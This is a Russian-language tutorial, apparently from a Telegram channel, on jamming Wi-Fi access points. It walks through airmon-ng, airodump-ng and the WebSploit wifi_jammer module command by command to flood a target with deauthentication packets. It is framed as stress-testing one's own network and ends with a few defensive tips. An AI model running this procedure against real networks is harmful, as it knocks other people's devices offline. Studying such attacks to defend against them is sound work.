Глушим Wi-Fi
https://t.me/Torchik_Ru![](/file/a70068994f1001677e096.png)
Возможно ли глушить Wi-Fi
Вы (или ваша организация) ответственно подошли к настройке беспроводных точек доступа (Wi-Fi): воспользовались подсказками по настройке роутера, в первую очередь, отключили WPS и придумали очень сложный пароль. Значит ли это, что теперь можно расслабиться? Нет, у злоумышленников, как минимум, ещё пара трюков в рукаве — DoS и глушение Wi-Fi. Даже если они не смогут проникнуть в вашу сеть, они могут воспрепятствовать её нормальной работе.
Эта инструкция описывает глушение Wi-Fi, предназначенный для стресс-теста вашей беспроводной сети, чтобы вы могли оценить имеющиеся угрозы и предпринять превентивные меры безопасности.
Как правильно запустить Wifi_Jammer
После обновления Aircrack-ng изменилось имя беспроводного интерфейса. К сожалению, Wifi_Jammer перестал работать. Но это легко можно исправить коррекцией одной строки. Посмотрите подробности в одной из предыдущих статей. Чиним Wifi_Jammer и Wifi_DoS в WebSploit. Если вы уже отредактировали исходный код Wifi_Jammer, то можно продолжать.
Посмотрим имя нашего интерфейса:
airmon-ng
![](/file/c1619c1e64bd71b04bc96.png)
Следующую команду запускаем так: airmon-ng start имя_интерфейса. У меня так:
airmon-ng start wlan0
![](/file/d6073b321fc1496a0ea44.png)
Обратите внимание, у меня появилось предупреждение (у вас его может и не быть):
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
3036 NetworkManager
3187 dhclien
Программа предупреждает, что имеются конфликты с другими приложениями и что если airodump-ng, aireplay-ng или airtun-ng останавливают работу после короткого времени, то мне нужно остановить названные процессы. Это можно сделать так (у вас могут быть свои цифры — посмотрите на PID):
kill 3036
kill 3187
Продолжаем:
airodump-ng wlan0mon
![](/file/8c333c4081a0c004129f8.png)
Я буду тренироваться на своей собственной ТД — она в самом вверху.
Запускаем WebSploit
websploit
Задействуем плагин wifi_jammer:
wsf > use wifi/wifi_jammer
![](/file/f07e9233e4a11835cce4f.png)
Вам обязательно нужно «отремонтировать» модуль wifi_jammer, поскольку после обновления сторонних программ, он стал неработоспособным. Подробности, а также как вернуть его в строй написано в этой инструкции.
Посмотрим на его опции :
wsf:Wifi_Jammer > show options
Нам нужно задать essid, bssid, channel и mon. Эти данные можно взять из вывода airodump-ng.
wsf:Wifi_Jammer > set essid Mial
wsf:Wifi_Jammer > set bssid 20:25:64:16:58:8C
wsf:Wifi_Jammer > set channel 11
Также обязательно:
wsf:Wifi_Jammer > set mon wlan0mon
Обратите внимание, что здесь нет вариантов, устанавливать значение нужно именно в wlan0mon.
Запускаем командой run:
wsf:Wifi_Jammer > run
Контролировать процесс можно двумя способами.
Первый — просто убедиться, что ваши устройства больше не подключены к беспроводной сети Wi-Fi.
Второй — с помощью команды airodump-ng wlan0mon. Обратите на такое поле её вывода как PWR. Его значение при нормальной работе находилось в районе 40. После начала атаки значение PWR составляет 0 и до самого конца атаки не поднимается. Сеть Wi-Fi в это время недоступна.
![](/file/658e6cd40320c72ade059.png)
В данном примере мы глушили одну точку доступа, возможно глушить сразу все ТД.
Суть атаки заключается в непрерывной отправке пакетов деаутентификации.
![](/file/6309845585d20b3ff4d62.png)
Борьба с глушением Wi-Fi
- Говорят, есть модели роутеров, которые не обращают внимание на широковещательные пакеты деаутентификации. Возможно, стоит поискать подобные модели.
- Во время атаки нужно понимать, что атакующий должен находиться в непосредственной близости — не более чем в нескольких сотнях метров.
- Можно настроить автоматический выбор канала в точке доступа. Это должно затруднить атаку, т. к. атакующий должен будет заботиться о переключении каналов.
- Радикальное решение — купить проводной роутер. Используйте полученные данные только в благих целях. Это оградит вас и других людей от проблем.